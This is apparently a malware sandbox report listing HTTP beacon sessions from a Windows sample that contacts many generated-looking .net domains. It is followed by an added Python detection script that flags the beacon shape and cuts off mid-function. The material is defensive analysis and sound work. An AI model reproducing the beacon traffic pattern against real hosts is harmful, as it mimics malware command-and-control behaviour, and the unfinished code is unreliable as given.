Aug 5, 2024 16:23:00.012031078 CEST  83                 OUT
  GET /index.php HTTP/1.0
  Accept: */*
  Connection: close
  Host: partygeneral.net
Aug 5, 2024 16:23:00.467889071 CEST  254                IN
  HTTP/1.1 200 OK
  Server: openresty
  Date: Mon, 05 Aug 2024 14:23:00 GMT
  Content-Type: text/html
  Content-Length: 114
  Connection: close
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.7  49701        35.164.78.200   80                3452  C:\whfkpbh\idtpqzltyfy.exe

Timestamp                            Bytes transferred  Direction  Data
Aug 5, 2024 16:23:02.497464895 CEST  84                 OUT
  GET /index.php HTTP/1.0
  Accept: */*
  Connection: close
  Host: memberreceive.net
Aug 5, 2024 16:23:03.262451887 CEST  382                IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 05 Aug 2024 14:23:03 GMT
  Content-Type: text/html
  Connection: close
  Set-Cookie: btst=210c7a536f0059a732bdffc00e0c9edb|8.46.123.33|1722867783|1722867783|0|1|0; path=/; domain=.memberreceive.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.7  49702        34.246.200.160  80                3452  C:\whfkpbh\idtpqzltyfy.exe

Timestamp                            Bytes transferred  Direction  Data
Aug 5, 2024 16:23:07.088696003 CEST  84                 OUT
  GET /index.php HTTP/1.0
  Accept: */*
  Connection: close
  Host: thoughtbranch.net
Aug 5, 2024 16:23:07.847978115 CEST  382                IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 05 Aug 2024 14:23:07 GMT
  Content-Type: text/html
  Connection: close
  Set-Cookie: btst=efa534bb5cc2dc5e9eb4f651311bf733|8.46.123.33|1722867787|1722867787|0|1|0; path=/; domain=.thoughtbranch.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.7  49703        15.197.142.173  80                3452  C:\whfkpbh\idtpqzltyfy.exe

Timestamp                            Bytes transferred  Direction  Data
Aug 5, 2024 16:23:08.695300102 CEST  83                 OUT
  GET /index.php HTTP/1.0
  Accept: */*
  Connection: close
  Host: womanbelieve.net
Aug 5, 2024 16:23:09.183926105 CEST  266                IN
  HTTP/1.1 403 Forbidden
  Server: awselb/2.0
  Date: Mon, 05 Aug 2024 14:23:09 GMT
  Content-Type: text/html
  Content-Length: 118
  Connection: close
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.7  49704        15.197.192.55   80                3452  C:\whfkpbh\idtpqzltyfy.exe

Timestamp                            Bytes transferred  Direction  Data
Aug 5, 2024 16:23:09.598023891 CEST  83                 OUT
  GET /index.php HTTP/1.0
  Accept: */*
  Connection: close
  Host: partybelieve.net
Aug 5, 2024 16:23:10.119362116 CEST  254                IN
  HTTP/1.1 200 OK
  Server: openresty
  Date: Mon, 05 Aug 2024 14:23:10 GMT
  Content-Type: text/html
  Content-Length: 114
  Connection: close
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.7  49708        85.13.130.3     80                3452  C:\whfkpbh\idtpqzltyfy.exe

Timestamp                            Bytes transferred  Direction  Data
Aug 5, 2024 16:23:13.325212002 CEST  83                 OUT
  GET /index.php HTTP/1.0
  Accept: */*
  Connection: close
  Host: membersystem.net
Aug 5, 2024 16:23:13.975238085 CEST  452                IN
  HTTP/1.1 301 Moved Permanently
  Date: Mon, 05 Aug 2024 14:23:13 GMT
  Server: Apache
  Location: https://all-inkl.com/index.php
  Content-Length: 238
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 6c 2d 69 6e 6b 6c 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://all-inkl.com/index.php">here</a>.</p></body></html>

Session ID: 6 | Source IP: 192.168.2.7 | Source Port: 49709 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3452 | Process: C:\whfkpbh\idtpqzltyfy.exe
Timestamp | Bytes transferred | Direction | Data
Aug 5, 2024 16:23:14.259835958 CEST | 82 | OUT | GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: membertrust.net
Aug 5, 2024 16:23:14.771369934 CEST | 254 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 05 Aug 2024 14:23:14 GMT
Content-Type: text/html
Content-Length: 114
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID: 7 | Source IP: 192.168.2.7 | Source Port: 49712 | Destination IP: 170.187.200.48 | Destination Port: 80 | PID: 3452 | Process: C:\whfkpbh\idtpqzltyfy.exe
Timestamp | Bytes transferred | Direction | Data
Aug 5, 2024 16:23:16.599848986 CEST | 81 | OUT | GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: crowdtrust.net
Aug 5, 2024 16:23:17.110980034 CEST | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 05 Aug 2024 14:23:17 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 8 | Source IP: 192.168.2.7 | Source Port: 49713 | Destination IP: 213.171.195.105 | Destination Port: 80 | PID: 3452 | Process: C:\whfkpbh\idtpqzltyfy.exe
Timestamp | Bytes transferred | Direction | Data
Aug 5, 2024 16:23:17.755304098 CEST | 84 | OUT | GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: thoughtsystem.net
Aug 5, 2024 16:23:18.628709078 CEST | 1236 | IN | HTTP/1.1 200 OK
server: nginx/1.20.1
date: Mon, 05 Aug 2024 14:23:18 GMT
content-type: text/html
content-length: 2873
last-modified: Tue, 16 Jul 2024 11:33:23 GMT
etag: "66965a83-b39"
accept-ranges: bytes
connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 73 2f 63 73 73 2f 69 6e 64 65 78 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 66 61 73 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title> <link rel="stylesheet" href="/styles/css/index.css"> <link rel="shortcut icon" href="https://static.fasthosts.co.uk/icons/favicon.ico" type="image/x-icon" /> ... Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-199510482-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-199510482-1'); </script> </head><body> <div class="container"> <nav class="logo"> <a href="https://fasthosts.co.uk/" rel="nofollow"> <img src="/assets/fasthosts-logo-secondary.svg" alt="Fasthosts"></img> </a> </nav> <main> <h2>Welcome to <span class="domain
Aug 5, 2024 16:23:18.628727913 CEST | 1236 | IN | Data Raw: 56 61 72 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 69 73 20 70 61 72 6b 65 64 20 66 6f 72 20 46 52 45 45 20 62 79 0a 20 20 20 20 20 20 20
Data Ascii: Var"></span></h2> <p> This domain name is parked for FREE by <strong><a href="https://fasthosts.co.uk/" rel="nofollow">fasthosts.co.uk</a></strong> </p> <div class="row"> <div class="card card--is-cta
Aug 5, 2024 16:23:18.628766060 CEST | 448 | IN | Data Raw: 66 61 73 74 68 6f 73 74 73 2e 63 6f 2e 75 6b 2f 63 6f 6e 74 61 63 74 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 64 6f 6d 61 69 6e 70 61 72 6b 69 6e 67 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 72 65 66 65 72 72 61 6c 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d
Data Ascii: fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_contact">Contact us</a> </main> </div> <script> const cleanHostname = document.location.hostname.indexOf("www.") && document.location.hos
Aug 5, 2024 16:23:18.628777981 CEST | 187 | IN | Data Raw: 61 22 29 2e 68 72 65 66 20 3d 20 60 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 68 6f 73 74 73 2e 63 6f 2e 75 6b 2f 64 6f 6d 61 69 6e 2d 6e 61 6d 65 73 2f 73 65 61 72 63 68 2f 3f 64 6f 6d 61 69 6e 3d 24 7b 63 6c 65 61 6e 48 6f 73 74 6e 61 6d
Data Ascii: a").href = `https://www.fasthosts.co.uk/domain-names/search/?domain=${cleanHostname}&utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_dac` </script></body></html>
Aug 5, 2024 16:23:18.633377075 CEST | 1236 | IN | HTTP/1.1 200 OK
server: nginx/1.20.1
date: Mon, 05 Aug 2024 14:23:18 GMT
content-type: text/html
content-length: 2873
last-modified: Tue, 16 Jul 2024 11:33:23 GMT
etag: "66965a83-b39"
accept-ranges: bytes
connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 73 2f 63 73 73 2f 69 6e 64 65 78 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 66 61 73 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title> <link rel="stylesheet" href="/styles/css/index.css"> <link rel="shortcut icon" href="https://static.fasthosts.co.uk/icons/favicon.ico" type="image/x-icon" /> ... Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-199510482-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-199510482-1'); </script> </head><body> <div class="container"> <nav class="logo"> <a href="https://fasthosts.co.uk/" rel="nofollow"> <img src="/assets/fasthosts-logo-secondary.svg" alt="Fasthosts"></img> </a> </nav> <main> <h2>Welcome to <span class="domain


Session ID: 9 | Source IP: 192.168.2.7 | Source Port: 49714 | Destination IP: 64.190.63.222 | Destination Port: 80 | PID: 3452 | Process: C:\whfkpbh\idtpqzltyfy.exe
Timestamp | Bytes transferred | Direction | Data
Aug 5, 2024 16:23:18.674741983 CEST | 82 | OUT | GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: watersystem.net
Aug 5, 2024 16:23:19.359216928 CEST | 208 | IN | HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html
connection: close
Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID: 10 | Source IP: 192.168.2.7 | Source Port: 49715 | Destination IP: 54.244.188.177 | Destination Port: 80 | PID: 3452 | Process: C:\whfkpbh\idtpqzltyfy.exe
Timestamp | Bytes transferred | Direction | Data
Aug 5, 2024 16:23:20.542334080 CEST | 81 | OUT | GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: womanhonor.net
Aug 5, 2024 16:23:21.353359938 CEST | 379 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Aug 2024 14:23:21 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=77f125e0628864a7c45e3434bce0ddf3|8.46.123.33|1722867801|1722867801|0|1|0; path=/; domain=.womanhonor.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT


Session ID: 11 | Source IP: 192.168.2.7 | Source Port: 49716 | Destination IP: 81.169.145.88 | Destination Port: 80 | PID: 3452 | Process: C:\whfkpbh\idtpqzltyfy.exe
Timestamp | Bytes transferred | Direction | Data
Aug 5, 2024 16:23:22.892755985 CEST | 81 | OUT | GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: freshfancy.net
Aug 5, 2024 16:23:23.542732000 CEST | 374 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Aug 2024 14:23:23 GMT
Server: Apache/2.4.61 (Unix)
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 49717 | 15.197.192.55 | 80 | 3452 | C:\whfkpbh\idtpqzltyfy.exe
Timestamp | Bytes transferred | Direction | Data
Aug 5, 2024 16:23:25.609951019 CEST | 84 | OUT | GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: alreadyfriend.net
Aug 5, 2024 16:23:26.152344942 CEST | 254 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 05 Aug 2024 14:23:26 GMT
Content-Type: text/html
Content-Length: 114
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49718 | 188.225.40.227 | 80 | 3452 | C:\whfkpbh\idtpqzltyfy.exe
Timestamp | Bytes transferred | Direction | Data
Aug 5, 2024 16:23:26.948259115 CEST | 83 | OUT | GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: followfriend.net
Aug 5, 2024 16:23:27.646753073 CEST | 373 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.26.1
Date: Mon, 05 Aug 2024 14:23:27 GMT
Content-Type: text/html
Content-Length: 169
Connection: close
Location: https://followfriend.net/index.php
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.26.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 59623 | 3.33.130.190 | 80 | 7912 | C:\whfkpbh\idtpqzltyfy.exe
Timestamp | Bytes transferred | Direction | Data
Aug 5, 2024 16:24:17.780365944 CEST | 83 | OUT | GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: partygeneral.net
Aug 5, 2024 16:24:18.320534945 CEST | 254 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 05 Aug 2024 14:24:18 GMT
Content-Type: text/html
Content-Length: 114
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 59624 | 35.164.78.200 | 80 | 7912 | C:\whfkpbh\idtpqzltyfy.exe
Timestamp | Bytes transferred | Direction | Data
Aug 5, 2024 16:24:48.053297043 CEST | 84 | OUT | GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: memberreceive.net
Aug 5, 2024 16:24:48.786004066 CEST | 382 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Aug 2024 14:24:48 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=c888f3a3f699a81491e3b3d2c6c0d945|8.46.123.33|1722867888|1722867888|0|1|0; path=/; domain=.memberreceive.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

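The four sessions above share one request shape: GET /index.php over HTTP/1.0 with only Accept, Connection: close and Host headers and no User-Agent, sent by the same dropped image (under two different PIDs) to four different hosts, and none of the hosts answered with anything but a JavaScript redirect to /lander, a 301 to HTTPS, or a bare 200 with cookies. The Python below is an added example, not part of the Joe Sandbox report, showing how to turn that observation into a check over captured sessions: it parses the raw request and response, flags the beacon shape, labels what each host sent back, and groups beacon requests by process image rather than PID (the sample runs as renamed copies, so a per-PID count splits the signal) to find images that contacted many distinct hosts. The Session records are transcribed from the tables above with response bodies shortened to the part the classifier reads; the browser-style control request, the "parked-lander-redirect" label and the min_hosts threshold are constructed for the example.

```python
"""Check over captured HTTP sessions for the beacon shape seen above.
Added example; the Session records are transcribed from the report, the
browser-style control request is constructed for contrast."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    session_id: int
    pid: int
    image: str         # process path from the report's session table
    dst_ip: str
    raw_request: str   # request line + headers as captured on the wire
    raw_response: str  # status line + headers (+ body); "" if none seen


IMAGE = r"C:\whfkpbh\idtpqzltyfy.exe"
# Request bytes are identical across sessions 12-15 apart from the Host value.
BEACON = "GET /index.php HTTP/1.0\r\nAccept: */*\r\nConnection: close\r\nHost: {}\r\n\r\n"
LANDER = ("HTTP/1.1 200 OK\r\nServer: openresty\r\nContent-Type: text/html\r\n\r\n"
          '<script>window.onload=function(){window.location.href="/lander"}</script>')

# Sessions 12-15 from the report; response bodies shortened to what is checked.
SESSIONS = [
    Session(12, 3452, IMAGE, "15.197.192.55", BEACON.format("alreadyfriend.net"), LANDER),
    Session(13, 3452, IMAGE, "188.225.40.227", BEACON.format("followfriend.net"),
            "HTTP/1.1 301 Moved Permanently\r\nServer: nginx/1.26.1\r\n"
            "Location: https://followfriend.net/index.php\r\n\r\n"),
    Session(14, 7912, IMAGE, "3.33.130.190", BEACON.format("partygeneral.net"), LANDER),
    Session(15, 7912, IMAGE, "35.164.78.200", BEACON.format("memberreceive.net"),
            "HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html\r\n"
            "Set-Cookie: snkz=8.46.123.33; path=/\r\n\r\n"),
]

# Constructed control: an ordinary HTTP/1.1 client request with a User-Agent.
BROWSER_REQUEST = ("GET /index.php HTTP/1.1\r\nHost: example.invalid\r\n"
                   "User-Agent: Mozilla/5.0 (constructed)\r\nAccept: */*\r\n\r\n")


def parse_message(raw):
    """Split a raw HTTP message into (start line, headers dict, body).
    Header names are lower-cased; a repeated header keeps its last value,
    which is enough for the fields these checks read."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def is_beacon_request(raw_request):
    """True for the shape in the sessions above: GET /index.php over HTTP/1.0,
    Connection: close, and no User-Agent header at all."""
    start, headers, _ = parse_message(raw_request)
    parts = start.split(" ")
    if len(parts) != 3:
        return False
    method, path, version = parts
    return (method == "GET" and path == "/index.php" and version == "HTTP/1.0"
            and "user-agent" not in headers
            and headers.get("connection", "").lower() == "close")


def classify_response(raw_response):
    """Label what the contacted host sent back. In the captured sessions every
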